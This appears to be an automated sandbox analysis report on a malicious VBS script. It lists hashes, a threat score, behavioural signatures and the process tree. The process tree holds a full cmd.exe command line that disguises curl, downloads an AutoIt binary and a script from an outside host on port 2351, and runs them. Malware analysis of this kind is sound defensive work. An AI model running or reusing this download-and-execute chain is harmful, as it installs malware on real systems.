Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
04-10-2023 13:53
General
-
Target
Test_395-13959.vbs
-
Size
6.9MB
-
MD5
5a9c56d5b6a4ae5fc402d99fa45f5598
-
SHA1
d1572724ca4ecc99edaf4104f51385265bb27682
-
SHA256
961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498
-
SHA512
5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57
-
SSDEEP
49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o xqkbij.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe xqkbij.au32⤵